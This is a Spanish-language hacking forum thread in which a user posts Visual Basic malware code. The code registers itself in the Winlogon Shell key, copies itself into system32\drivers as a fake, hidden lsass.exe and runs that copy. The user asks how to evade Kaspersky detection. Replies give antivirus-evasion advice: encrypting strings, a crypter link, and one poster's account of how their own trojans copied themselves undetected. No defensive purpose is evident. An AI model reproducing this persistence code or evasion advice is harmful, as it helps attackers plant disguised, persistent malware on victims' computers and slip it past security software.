Buenas,
el pedazo de codigo que detecta es:
Reg_Crea_KeyConValor HKEY_LOCAL_MACHINE, "SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon", "Shell", "Explorer.exe, " & Environ("WinDir") & "\system32\drivers\lsass.exe"
FileCopy App.Path & "\" & App.EXEName & ".exe", Environ("WinDir") & "\system32\drivers\lsass.exe" 'lo copiamos
SetAttr Environ("WinDir") & "\system32\drivers\lsass.exe", vbHidden + vbReadOnly + vbSystem
DoEvents
Shell Environ("WinDir") & "\system32\drivers\lsass.exe" 'y lo ejecutamos
Les digo las combinaciones que detecta:
cuando FileCopy no esta no lo detecta, cuando reg_crea_keyconvalor y shell no estan tampoco lo detecta, cuando solo le cambio el nombre al FileCopy digamos le cambio el lsass no lo detecta, intente ponerlo en funcion para que saque de ahi el nombre, tambien intente ponerlo con strreverse.. nadap.. alguna solucion?
Saludos!
PD: el Antivirus es el Kaspersky
Que tal si encriptas las cadenas?
Citar[KPC], cifra tus proyectos en VB (http://internal-minds.com.ar/2008/07/source-karcrack-project-crypter.html)
Saludos ;)
asi es, deberias buscar en google, una funcion para cifrar strings
Igualmente en este foro recuerdo haer posteado algo asi. dejame ver...
te digo lo q yo hacia en mis troyanos...
para q se copien a otra carpeta.. no usaba filecopy xq tb me lo detectaba... lo habria en una cadena a si mismo.. creaba el archivo en otra carpeta... y cerraba el archivo... luego lo ejecutaba al nuevo archivo.. este esperaba 10 seg a q el otro termine y se cierre.. lo buscaba y lo borraba...
luego para el regedit simplemente encriptaba el texto plano y ya no te lo detecta
SALUDOS
Muchas gracias muchachos!
Saludos!